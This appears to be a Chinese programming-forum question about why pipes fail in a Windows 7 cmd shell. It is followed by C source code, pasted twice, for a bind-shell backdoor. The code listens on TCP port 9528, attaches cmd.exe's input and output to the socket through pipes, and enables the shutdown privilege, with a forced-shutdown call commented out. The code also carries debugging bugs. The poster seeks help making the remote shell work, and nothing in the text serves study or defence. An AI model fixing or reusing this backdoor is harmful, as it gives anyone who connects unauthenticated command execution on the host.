W7下CMDSHELL 和NT系统是一样的吗 为什么管道不能使用求查看代码错误
#include "head.h"
#define RECV_LEN 4096
#define PATH_MAX 256
bool st = true;
DWORD WINAPI InputThreadPro(LPVOID lpParam)//输入管道函数
{
ThreadNode lpNode = *(ThreadNode*)lpParam; //缓冲区
char* Buffer = (char*)malloc(PATH_MAX);//初始化
int ret = 0;
//int retlen = 0;
DWORD Bufferlen;
while(true)
{
//ZeroMemory(Buffer,PATH_MAX);
ret = recv(lpNode.T_sock,Buffer,1024,0);//接受信息
if(ret > 0 && ret != SOCKET_ERROR)
{
WriteFile(lpNode.T_pipe,Buffer,ret,&Bufferlen,NULL);
}
else
{
//WriteFile(lpNode.T_pipe,"exit\r\n",sizeof("exit\r\n"),&Bufferlen,NULL);
//closesocket(lpNode.T_sock);
//st = false;
//break;
}
/*retlen += ret;
if(ret == 0)
{
break;
}*/
Sleep(50);
}
return true;
}
DWORD WINAPI OutputThreadPro(LPVOID lpParam)//输出管道函数
{
ThreadNode lpNode = *(ThreadNode*)lpParam;
char* Buffer = (char*)malloc(RECV_LEN);//初始化
DWORD Bufferlen, BufferLen;
bool st1;
while(true)
{
st1 = PeekNamedPipe(lpNode.T_pipe,NULL,0,NULL,&Bufferlen,NULL);//检测管道
if(st1 == true && Bufferlen > 0)
{
ReadFile(lpNode.T_pipe,&Buffer, RECV_LEN,&BufferLen,NULL);//输出数据
if(BufferLen > 0)
{
SendData(Buffer,lpNode.T_sock);//发送数据
ZeroMemory(Buffer,RECV_LEN);
}
}
Sleep(50);
}
return true;
}
bool OpenCMD(HANDLE hReadPipe1,HANDLE hWritePipe2)/*HANDLE hReadPipe1,HANDLE hWritePipe2*///打开CMD
{
STARTUPINFO os;
PROCESS_INFORMATION pi;
os.cb = sizeof(STARTUPINFO);
GetStartupInfo(&os);
TCHAR* szCmdLine = (TCHAR*)malloc(PATH_MAX);
GetSystemDirectory(szCmdLine,PATH_MAX);
wcscat(szCmdLine,TEXT("\\cmd.exe"));
os.dwFlags = /*STARTF_USESHOWWINDOW | */STARTF_USESTDHANDLES;
//os.wShowWindow = SW_HIDE;
os.hStdInput = hReadPipe1;
os.hStdOutput = os.hStdError = hWritePipe2;
BOOL a = CreateProcess(szCmdLine, NULL, NULL, NULL, true, 0, NULL, NULL, &os, &pi);
if(a)
{
return true;
}
else
{
return false;
}
}
bool SocketInfo()//SOCKET连接初始化
{
WSADATA wsa = {0};
if(0 == WSAStartup(MAKEWORD(2,2),&wsa))
{
return true;
}
return false;
}
void SendData(char* Buffer,SOCKET ServerSock)//循环输出大数据
{
int ret = 0;
int RectLen = 0;
do
{
ret = send(ServerSock,Buffer+RectLen,1024,0);
RectLen += ret;
if(ret <= 0)
{
break;
}
}
while(RectLen>0);
}
SOCKET CreatSocket(SOCKET ServerSock, sockaddr_in ServerSockaddr)//创建SOCKET连接
{
int n;
if(SocketInfo() == true)
{
ServerSock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(ServerSock != SOCKET_ERROR)
{
ServerSockaddr.sin_family = AF_INET;//三元组
ServerSockaddr.sin_port = htons(9528);
ServerSockaddr.sin_addr.s_addr = htonl(INADDR_ANY);
n = bind(ServerSock,(sockaddr *)&ServerSockaddr,sizeof(ServerSockaddr));//绑定端口
int a = WSAGetLastError();
if(n != SOCKET_ERROR)
{
if(listen(ServerSock,10) != SOCKET_ERROR)//监听端口
{
int leng = sizeof(ServerSockaddr);
int* len = &leng;
SOCKET acceptsock = accept(ServerSock,(struct sockaddr *)&ServerSockaddr,len);//创建连接传输套接字
if(acceptsock != SOCKET_ERROR)
{
MessageBox(NULL,TEXT("端口打开"),TEXT("端口"),MB_OK);
return acceptsock;
}
}
}
}
}
return 0;
}
bool EnableShutDownPriv()//提权
{
HANDLE Token;
TOKEN_PRIVILEGES Tkp = {0};
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY ,&Token))
{
MessageBox(NULL,TEXT("标题"),TEXT("关机了0!"),MB_OK);
return false;
}
if(!LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&Tkp.Privileges[0].Luid))
{
MessageBox(NULL,TEXT("标题"),TEXT("关机了1!"),MB_OK);
return false;
}
Tkp.PrivilegeCount = 1;
Tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(!AdjustTokenPrivileges(Token,false,&Tkp,sizeof(TOKEN_PRIVILEGES),NULL,NULL))
{
CloseHandle(Token);
MessageBox(NULL,TEXT("标题"),TEXT("关机了3!"),MB_OK);
return false;
}
return true;
}
bool SetSystemClose()//关机函数
{
OSVERSIONINFO osvi = {0};
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&osvi);
if(osvi.dwPlatformId == VER_PLATFORM_WIN32_NT)
{
if(EnableShutDownPriv() == true)
{
//ExitWindowsEx(EWX_SHUTDOWN|EWX_FORCE,0);
MessageBox(NULL,TEXT("标题"),TEXT("关机了!"),MB_OK);
}
return false;
}
else
{
MessageBox(NULL,TEXT("标题"),TEXT("关机了ss!"),MB_OK);
return false;
}
return true;
}
void ShellCMD()
{
SOCKET ServerSocket = NULL;
sockaddr_in ServerSockaddr = {0};
//bool SockCondition = false;
SOCKET AcceptSock = CreatSocket(ServerSocket,ServerSockaddr);
if(AcceptSock != SOCKET_ERROR)
{
MessageBox(NULL,TEXT("连接上了!"),TEXT("连接"),MB_OK);
}
DWORD dwThreadWrite, dwThreadRead;
HANDLE hReadPipe1 = NULL,hWritePipe1 = NULL, hReadPipe2 = NULL, hWritePipe2 = NULL;//建立管道句柄
SECURITY_ATTRIBUTES la = {0};//安全描述符
la.bInheritHandle = true;
la.lpSecurityDescriptor = NULL;
la.nLength = sizeof(SECURITY_ATTRIBUTES);
int c1 = CreatePipe(&hReadPipe1,&hWritePipe1,&la,0);//创建管道
int c2 = CreatePipe(&hReadPipe2,&hWritePipe2,&la,0);//创建管道
ThreadNode InNode = {0};
InNode.T_sock = AcceptSock;
bool cmd = OpenCMD(hReadPipe1,hWritePipe2);
InNode.T_pipe = hWritePipe1;
HANDLE ReadThread = CreateThread(NULL,0,InputThreadPro,(LPVOID)&InNode,0,&dwThreadRead);//创建管道线程
InNode.T_pipe = hReadPipe2;
HANDLE WriteThread = CreateThread(NULL,0,OutputThreadPro,(LPVOID)&InNode,0,&dwThreadWrite);//创建管道线程
HANDLE szHandle[] = {ReadThread,WriteThread};
WaitForMultipleObjects(2,szHandle,true,INFINITE); //等待结束函数
//SetSystemClose();
MessageBox(NULL,TEXT("标题"),TEXT("关机了6!"),MB_OK);//测试用
}
int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow)
{
EnableShutDownPriv();
ShellCMD();
//SetSystemClose();
//OpenCMD();
return 0;
}
#include "head.h"
#define RECV_LEN 4096
#define PATH_MAX 256
bool st = true;
DWORD WINAPI InputThreadPro(LPVOID lpParam)//输入管道函数
{
ThreadNode lpNode = *(ThreadNode*)lpParam; //缓冲区
char* Buffer = (char*)malloc(PATH_MAX);//初始化
int ret = 0;
//int retlen = 0;
DWORD Bufferlen;
while(true)
{
//ZeroMemory(Buffer,PATH_MAX);
ret = recv(lpNode.T_sock,Buffer,1024,0);//接受信息
if(ret > 0 && ret != SOCKET_ERROR)
{
WriteFile(lpNode.T_pipe,Buffer,ret,&Bufferlen,NULL);
}
else
{
//WriteFile(lpNode.T_pipe,"exit\r\n",sizeof("exit\r\n"),&Bufferlen,NULL);
//closesocket(lpNode.T_sock);
//st = false;
//break;
}
/*retlen += ret;
if(ret == 0)
{
break;
}*/
Sleep(50);
}
return true;
}
DWORD WINAPI OutputThreadPro(LPVOID lpParam)//输出管道函数
{
ThreadNode lpNode = *(ThreadNode*)lpParam;
char* Buffer = (char*)malloc(RECV_LEN);//初始化
DWORD Bufferlen, BufferLen;
bool st1;
while(true)
{
st1 = PeekNamedPipe(lpNode.T_pipe,NULL,0,NULL,&Bufferlen,NULL);//检测管道
if(st1 == true && Bufferlen > 0)
{
ReadFile(lpNode.T_pipe,&Buffer, RECV_LEN,&BufferLen,NULL);//输出数据
if(BufferLen > 0)
{
SendData(Buffer,lpNode.T_sock);//发送数据
ZeroMemory(Buffer,RECV_LEN);
}
}
Sleep(50);
}
return true;
}
bool OpenCMD(HANDLE hReadPipe1,HANDLE hWritePipe2)/*HANDLE hReadPipe1,HANDLE hWritePipe2*///打开CMD
{
STARTUPINFO os;
PROCESS_INFORMATION pi;
os.cb = sizeof(STARTUPINFO);
GetStartupInfo(&os);
TCHAR* szCmdLine = (TCHAR*)malloc(PATH_MAX);
GetSystemDirectory(szCmdLine,PATH_MAX);
wcscat(szCmdLine,TEXT("\\cmd.exe"));
os.dwFlags = /*STARTF_USESHOWWINDOW | */STARTF_USESTDHANDLES;
//os.wShowWindow = SW_HIDE;
os.hStdInput = hReadPipe1;
os.hStdOutput = os.hStdError = hWritePipe2;
BOOL a = CreateProcess(szCmdLine, NULL, NULL, NULL, true, 0, NULL, NULL, &os, &pi);
if(a)
{
return true;
}
else
{
return false;
}
}
bool SocketInfo()//SOCKET连接初始化
{
WSADATA wsa = {0};
if(0 == WSAStartup(MAKEWORD(2,2),&wsa))
{
return true;
}
return false;
}
void SendData(char* Buffer,SOCKET ServerSock)//循环输出大数据
{
int ret = 0;
int RectLen = 0;
do
{
ret = send(ServerSock,Buffer+RectLen,1024,0);
RectLen += ret;
if(ret <= 0)
{
break;
}
}
while(RectLen>0);
}
SOCKET CreatSocket(SOCKET ServerSock, sockaddr_in ServerSockaddr)//创建SOCKET连接
{
int n;
if(SocketInfo() == true)
{
ServerSock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(ServerSock != SOCKET_ERROR)
{
ServerSockaddr.sin_family = AF_INET;//三元组
ServerSockaddr.sin_port = htons(9528);
ServerSockaddr.sin_addr.s_addr = htonl(INADDR_ANY);
n = bind(ServerSock,(sockaddr *)&ServerSockaddr,sizeof(ServerSockaddr));//绑定端口
int a = WSAGetLastError();
if(n != SOCKET_ERROR)
{
if(listen(ServerSock,10) != SOCKET_ERROR)//监听端口
{
int leng = sizeof(ServerSockaddr);
int* len = &leng;
SOCKET acceptsock = accept(ServerSock,(struct sockaddr *)&ServerSockaddr,len);//创建连接传输套接字
if(acceptsock != SOCKET_ERROR)
{
MessageBox(NULL,TEXT("端口打开"),TEXT("端口"),MB_OK);
return acceptsock;
}
}
}
}
}
return 0;
}
bool EnableShutDownPriv()//提权
{
HANDLE Token;
TOKEN_PRIVILEGES Tkp = {0};
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY ,&Token))
{
MessageBox(NULL,TEXT("标题"),TEXT("关机了0!"),MB_OK);
return false;
}
if(!LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&Tkp.Privileges[0].Luid))
{
MessageBox(NULL,TEXT("标题"),TEXT("关机了1!"),MB_OK);
return false;
}
Tkp.PrivilegeCount = 1;
Tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(!AdjustTokenPrivileges(Token,false,&Tkp,sizeof(TOKEN_PRIVILEGES),NULL,NULL))
{
CloseHandle(Token);
MessageBox(NULL,TEXT("标题"),TEXT("关机了3!"),MB_OK);
return false;
}
return true;
}
bool SetSystemClose()//关机函数
{
OSVERSIONINFO osvi = {0};
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&osvi);
if(osvi.dwPlatformId == VER_PLATFORM_WIN32_NT)
{
if(EnableShutDownPriv() == true)
{
//ExitWindowsEx(EWX_SHUTDOWN|EWX_FORCE,0);
MessageBox(NULL,TEXT("标题"),TEXT("关机了!"),MB_OK);
}
return false;
}
else
{
MessageBox(NULL,TEXT("标题"),TEXT("关机了ss!"),MB_OK);
return false;
}
return true;
}
void ShellCMD()
{
SOCKET ServerSocket = NULL;
sockaddr_in ServerSockaddr = {0};
//bool SockCondition = false;
SOCKET AcceptSock = CreatSocket(ServerSocket,ServerSockaddr);
if(AcceptSock != SOCKET_ERROR)
{
MessageBox(NULL,TEXT("连接上了!"),TEXT("连接"),MB_OK);
}
DWORD dwThreadWrite, dwThreadRead;
HANDLE hReadPipe1 = NULL,hWritePipe1 = NULL, hReadPipe2 = NULL, hWritePipe2 = NULL;//建立管道句柄
SECURITY_ATTRIBUTES la = {0};//安全描述符
la.bInheritHandle = true;
la.lpSecurityDescriptor = NULL;
la.nLength = sizeof(SECURITY_ATTRIBUTES);
int c1 = CreatePipe(&hReadPipe1,&hWritePipe1,&la,0);//创建管道
int c2 = CreatePipe(&hReadPipe2,&hWritePipe2,&la,0);//创建管道
ThreadNode InNode = {0};
InNode.T_sock = AcceptSock;
bool cmd = OpenCMD(hReadPipe1,hWritePipe2);
InNode.T_pipe = hWritePipe1;
HANDLE ReadThread = CreateThread(NULL,0,InputThreadPro,(LPVOID)&InNode,0,&dwThreadRead);//创建管道线程
InNode.T_pipe = hReadPipe2;
HANDLE WriteThread = CreateThread(NULL,0,OutputThreadPro,(LPVOID)&InNode,0,&dwThreadWrite);//创建管道线程
HANDLE szHandle[] = {ReadThread,WriteThread};
WaitForMultipleObjects(2,szHandle,true,INFINITE); //等待结束函数
//SetSystemClose();
MessageBox(NULL,TEXT("标题"),TEXT("关机了6!"),MB_OK);//测试用
}
int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow)
{
EnableShutDownPriv();
ShellCMD();
//SetSystemClose();
//OpenCMD();
return 0;
}